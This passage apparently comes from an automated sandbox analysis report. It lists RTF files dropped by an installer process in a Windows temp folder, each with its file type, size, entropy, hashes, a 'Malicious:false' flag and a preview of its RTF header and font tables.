                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch11\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7403
                                                                                                                                                                                                                                                          Entropy (8bit):4.92938927718366
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su76z6C6D6E6f6E6O6Y6K222K2a2O2G2y2E2+2tuADuEXu6mp49T20l49D7D7DP:X6z6C6D6E6f6E6O6Y6K222K2a2O2G2yx
                                                                                                                                                                                                                                                          MD5:3D3D6A046CC73D49EA8D98E66103EBC5
                                                                                                                                                                                                                                                          SHA1:3F3F6AD63BEE3F893EE2F57AF6D261AFD0A8C639
                                                                                                                                                                                                                                                          SHA-256:344EBAAFF1EC7B1BF2A627DD9A5F1B0D3C5D968F23ADA7D6A7175767B29AF483
                                                                                                                                                                                                                                                          SHA-512:405236F4E6F223EFD593A22047B79156ED9695DDE0EB4BB4261891375C3FE586251AD3E9EE9EDF914AC02AB7C51887F16A5897915B0BEE8CC708CF6B116D9342
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64122
                                                                                                                                                                                                                                                          Entropy (8bit):5.005532059876539
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2NFM7S0LzLpzBDlmvMuLoPxsMOaWAebaTkPYxmjyzZNBPirmqCadCg0WOxuiOQYX:2N4Sqse5bhHsTs64pPIA98
                                                                                                                                                                                                                                                          MD5:20DED089CE49980F6BA7C2DDFBB4A359
                                                                                                                                                                                                                                                          SHA1:A80EB4246514293DC65C07621B04DB34434DA4FB
                                                                                                                                                                                                                                                          SHA-256:7644F6129405227CC015DC574D41769A25B147A33792008A3BC97D6CA2B31F84
                                                                                                                                                                                                                                                          SHA-512:6863BF40030EE2FA1274103F637F1C8BD0601C5CF9C4EBE6684F13B7F1628B865D7297D464DD623CE50F7C0DFAB9B52CB42E8E6F6843D859469377DBFE68E5B5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}..{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}..{\f43\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@Wen
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7884
                                                                                                                                                                                                                                                          Entropy (8bit):4.965317939103163
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:zersYRcg17pzo2uz1FwLcxwSwbzUPhjNAqecUAySMnuturWGi:ZYf7doz1FwLcxwSwnUPhxAqecUAyLuIA
                                                                                                                                                                                                                                                          MD5:83F331C3191915043D3C1F96D04AD2AA
                                                                                                                                                                                                                                                          SHA1:1F5A281457AD229178ADFE68E6ED3C407DD15BA5
                                                                                                                                                                                                                                                          SHA-256:864E70E0CBF1CBB5EF7B65EC5A90D617D299A0C896E17EA6C973BF5D0F44ADA0
                                                                                                                                                                                                                                                          SHA-512:C047F469B1A5BF82D88443D33B1B26AA30B4CB1E5C8A515119B5D62B3D98C4761830761D0813994DAA9BDE86BB7F73ABF47ADDE25A74D6FCEA05D5F0E0E779B6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\froman\fprq2\fcharset128 Times New Roman;}{\f8\froman\fprq0\fcharset128 Times New Roman;}{\f9\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f10\fnil\fprq2\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Lohit Hindi;}{\f12\fnil\fprq2\fcharset128 Arial;}{\f13\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af9\langfe2052\dbch\af10\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af9\dbch\af10\afs28\loch\f4\fs28 Intestazione;}.{\s16\sba
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):76355
                                                                                                                                                                                                                                                          Entropy (8bit):4.982630349215747
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:KewXZEMuTyIT+TWkN+3vMHRYRv0lTiHRYRv0lTiHRYRv0lHiHRYRv0leUE/lLr/6:KeMEZgIA9C
                                                                                                                                                                                                                                                          MD5:0DD30E30324435D32C3336875F79F308
                                                                                                                                                                                                                                                          SHA1:6F38100EBA73AAD482B1B290FF5C21DD0C3AA692
                                                                                                                                                                                                                                                          SHA-256:D9939A99B67D9267B439373CC44EE14A10432AF1BB3AEB6EBBDDE1839EDCBD99
                                                                                                                                                                                                                                                          SHA-512:62513A5EDAF36F0D69A9519F74795659493A1B0C9B9E662D0AF4C15A7F68043F6C3A2F9231D9C949572D787524448C8F31B4A6AE9D242FB28758BA084C3B9545
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch11\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt MS PMincho};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10281
                                                                                                                                                                                                                                                          Entropy (8bit):4.953685836066729
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9S:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6Z
                                                                                                                                                                                                                                                          MD5:8D669B205AF7D1401C340D474FADE116
                                                                                                                                                                                                                                                          SHA1:C61F519EF768F519E93F456D61FCEFE93EF1A058
                                                                                                                                                                                                                                                          SHA-256:2B01786D3BA405BAA36920EF092701AF28CEA08F56507D4DE9717D47474C3B65
                                                                                                                                                                                                                                                          SHA-512:0697175789BE81C29F0FBB5DD815FB46B553A6D241D8936C0E29F95D23651A2B730A893B98C90F6F3494B93FF0144F05DE95DB24D089EC01084C0FC8E36B3F70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37355
                                                                                                                                                                                                                                                          Entropy (8bit):5.0224273603988925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rF4DO6zLpzBMRQ1W7MiynhCGm7aVZ/6A9a:2raD7IA9a
                                                                                                                                                                                                                                                          MD5:72215D6BB69B80AD421E5FBEC9CEE983
                                                                                                                                                                                                                                                          SHA1:4DC407E1BF25A18F3C9B2F2E94440D3A0AC505D8
                                                                                                                                                                                                                                                          SHA-256:0B1A02997F8DC944153BBEA47C302C3A155B1363A2A4F6A23218EB1BA9D1ACD8
                                                                                                                                                                                                                                                          SHA-512:D1F1409D1E0946F84F3D3D3FBBB90BB23195A84402E0DA16A102C62E1198F28AB80046E805A3B4CAAD0B61039E07B57350133F1E0DCB3142A0B2487F1F1174B4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt Times New Roman};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@WenQuanYi Micro Hei;}..{\f316\fbidi \froman\fcharset128\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9031
                                                                                                                                                                                                                                                          Entropy (8bit):4.942487008032181
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9v:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6Q
                                                                                                                                                                                                                                                          MD5:140A646744F5CA2B77DC3CCAB81BE3E9
                                                                                                                                                                                                                                                          SHA1:57D15787E167C9284D0A57DE074749A8A10D6267
                                                                                                                                                                                                                                                          SHA-256:FACA864E826FC4333E1C6D8726C97446A824856214E302B154757A0071BB0666
                                                                                                                                                                                                                                                          SHA-512:F00406EA7C8EDA722707892A86C72A1331F1DEB007A78F34CC27A3B6175D3737AF9DA542F926313644B1CF0D8BAE087529196DBEEC4C7AE6EA3BCD5CE42D0F0F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10431
                                                                                                                                                                                                                                                          Entropy (8bit):4.953862205312216
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su79jU9jV9jW9ju9j89jM9j39jO9jR6z6C6D6E6f6E6O6Y6Y222K2a2O2G2y2E2S:X9jU9jV9jW9ju9j89jM9j39jO9jR6z6o
                                                                                                                                                                                                                                                          MD5:F253166C14180CDA4CF3682EBDA81E10
                                                                                                                                                                                                                                                          SHA1:42CB7285AE2A1D8FFFBDB8E92DD762F116E6E5E7
                                                                                                                                                                                                                                                          SHA-256:21604302E29A98F4F73EB4DD22C1B3FD52840C05B9438769E8568E69A2AD6890
                                                                                                                                                                                                                                                          SHA-512:26EF9FFCDBE8D66B92954FA2DC046B7049B772B789BD4192D62CCDEA211D613413B241E1527396FCCF6087B041A526641C9D12F5C29810637C42AFF812A15061
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11086
                                                                                                                                                                                                                                                          Entropy (8bit):4.962530121956413
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:R2KwSyFd222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jl9ju9jV9j19j/9jX9C:Mrpd222K2a2O2G2y2E2+2L6z6C6D6E6h
                                                                                                                                                                                                                                                          MD5:74D21CC581EFD9F3D31C02D2AD6A7881
                                                                                                                                                                                                                                                          SHA1:701EEEA34850D7EE69EFF56E2344A79A7EAD147E
                                                                                                                                                                                                                                                          SHA-256:9F632C17885E51A74C7875780F422952F1BC64DB978D8EBA765251F692C603E3
                                                                                                                                                                                                                                                          SHA-512:97EC2913358966E62D5D69BD63D0D3C378457BE371702957F25358BAB2DD1C514F92AF769C4FA1A1A4CD3B23F1F7C0358E7B838CC80163CF78775634D4CAC8A4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq0\fcharset128 Tahoma;}{\f6\froman\fprq2\fcharset128 Arial;}{\f7\froman\fprq0\fcharset128 Arial;}{\f8\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f9\fnil\fprq2\fcharset128 Lohit Hindi;}{\f10\fnil\fprq0\fcharset128 Lohit Hindi;}{\f11\fnil\fprq0\fcharset128 Times New Roman;}{\f12\fnil\fprq0\fcharset128 Courier New Baltic;}{\f13\fnil\fprq2\fcharset128 Arial;}{\f14\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af8\langfe2052\dbch\af9\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s2\sbasedon15\snext16\ilvl1\outlinelevel1\ql\widctlpar\faauto\li0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40044
                                                                                                                                                                                                                                                          Entropy (8bit):5.023249387110861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rF4DO6xByF3LSVj1BgpGk1WhhIHRYRv0lsSTz3BAbZ/6A9u:2raDlZIA9u
                                                                                                                                                                                                                                                          MD5:994EC92B482BB93D1038B2F931B60AA4
                                                                                                                                                                                                                                                          SHA1:130934CF53D1215C4955232421AB44C7CCD1F95B
                                                                                                                                                                                                                                                          SHA-256:9A48D1986A44E9021CE072DE9A9D542357048ABBE6807E4CA151661708969D3C
                                                                                                                                                                                                                                                          SHA-512:5F2424B1B38FC0939FDCF6C29A72067174CB49FC4F97C6CE284570984047B4D5CFBDBB84D63F619DF24B8EAF070FAC3EE71858CD7D9536F5C7920A0AACA895E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt Times New Roman};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@WenQuanYi Micro Hei;}..{\f316\fbidi \froman\fcharset128\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10229
                                                                                                                                                                                                                                                          Entropy (8bit):4.949701462728225
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:6L1GSkFI222K2a2O2G2y2E2+2L6z6C6D6E6f6E6O6Y6Y9jn9js9j39jX9jR9jp9z:0sFI222K2a2O2G2y2E2+2L6z6C6D6E6o
                                                                                                                                                                                                                                                          MD5:328B6D1A72880E42399A6A9FAAE89707
                                                                                                                                                                                                                                                          SHA1:B90F232CBADDD083D3E72EED57B362DBB5BB6B89
                                                                                                                                                                                                                                                          SHA-256:731252A5DD9F5F1D6BAF95F06B86795064735EF2EDB2A7B0A0400535B28FB1C2
                                                                                                                                                                                                                                                          SHA-512:70D96DB14DF3EA083AF7512998DBD565CD5DDEFDA0CB61A3378B9563642CB5FACD4D80A70763A454BE7B7BF4AA28A60C9B31AF7916066C9E56C5DB1A6F3D93D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\fswiss\fprq0\fcharset128 Calibri;}{\f6\froman\fprq0\fcharset128 Tahoma;}{\f7\froman\fprq0\fcharset128 Calibri;}{\f8\froman\fprq2\fcharset128 Arial;}{\f9\froman\fprq0\fcharset128 Arial;}{\f10\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f11\fnil\fprq2\fcharset128 Lohit Hindi;}{\f12\fnil\fprq0\fcharset128 Lohit Hindi;}{\f13\fnil\fprq0\fcharset128 Times New Roman;}{\f14\fnil\fprq0\fcharset128 Courier New Baltic;}{\f15\fnil\fprq2\fcharset128 Arial;}{\f16\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af10\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang1040
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47653
